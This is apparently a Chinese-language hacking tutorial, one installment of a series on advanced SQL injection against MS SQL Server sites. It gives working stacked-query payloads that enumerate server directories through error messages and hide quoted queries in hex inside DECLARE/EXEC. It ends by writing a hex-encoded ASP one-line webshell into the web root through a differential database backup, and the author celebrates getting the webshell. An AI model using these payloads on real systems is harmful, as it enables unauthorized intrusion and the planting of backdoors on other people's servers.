SQL注入高级技巧nowthk篇

核心提示： 上述的temp远程表中还有目录名呢,太乱，在远程直接建个新表:;create talbe temp1(id nvarchar(4000))--然后把temp表中一级目录名称插到这里来，SQL注入高级技巧nowthk篇(5)，语句:;insert into temp1(id) select

上述的temp远程表中还有目录名呢,太乱，在远程直接建个新表:;create talbe temp1(id nvarchar(4000))--然后把temp表中一级目录名称插到这里来，语句:;insert into temp1(id) select id from temp where num1=1--
然后再暴: and 1=(select top 1 id from temp1 where id=1),提示:xxxxxxxxxxxx’MUbak’转换为int.....等出错等信息，我是不是很懒，连出错信息都不复制？明白就行了。
暴下一个目录不可能用 and 1=(select top 1 id from temp1 where id not in(’MUbak’))吧？因为里面有单引号呀,不是上面说可以用declare吗?错!这是暴,可不是执行命令呀，不要弄错！
抽了一根烟，想了想，还有一个办法，再把temp1的目录一层一层地扒下来，把他们传递给temp2表,呵呵，肯定要先建表了;create table temp2(id char(255))--。
先想明白语句，我把temp1的id下所有的名称，给于temp2，而且不包括’MUbak’目录，那么语句应该是:

insert into temp2(id) select id from temp1 where id not in(’MUbak’)

呵呵，有单引号，declare!!!，上面语句转16进制。

语句为: DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F002000740065006D007000320028006900640029002000730065006C006500630074002000690064002000660072006F006D002000740065006D007000310020007700680065007200650020006900640020006E006F007400200069006E00280027004D005500620061006B0027002900 AS NVARCHAR(4000));EXEC(@S);

这时，我在temp2暴表:and 1=(select top 1 id from temp2)，提示xxxxxxxxxxxx’wwwbak’转换为int.....等出错等信息。。呵呵，又一个目录出来了。
然后删表temp2表，建temp3表，用上面的访法循环暴出下一个目录。

可能有人问，为什么要建temp3表，直接删掉temp2，然后再建temp2再用呀，不过经验认为，这里最好新建一个，本人认为是缓存的原因，否则一直用老表，暴错的信息为同一个。。。。
好了，经过漫长的时间，终于找出了网站的目录为D:\web\www\，下来备份呗。
;create table riri(ri char(255))--
;insert into riri(ri) values(0x3C25657865637574652872657175657374282261222929253E)-- ’0x3C25657865637574652872657175657374282261222929253E"为<%execute request("a")%>
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x443a5c7765625c7777775c312e617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT　　　　　　 ’0x443a5c7765625c7777775c312e617370为D:\web\www\1.asp

这时成功得在网站目录备分了一个1.asp，访问www.xxx.com/1.asp 出现’execute’错误，呵呵，一个webshell到手了。看得很麻烦吧，如果有人做出工具来了就简单多了，否则累死你~~　 哈哈，闪先~~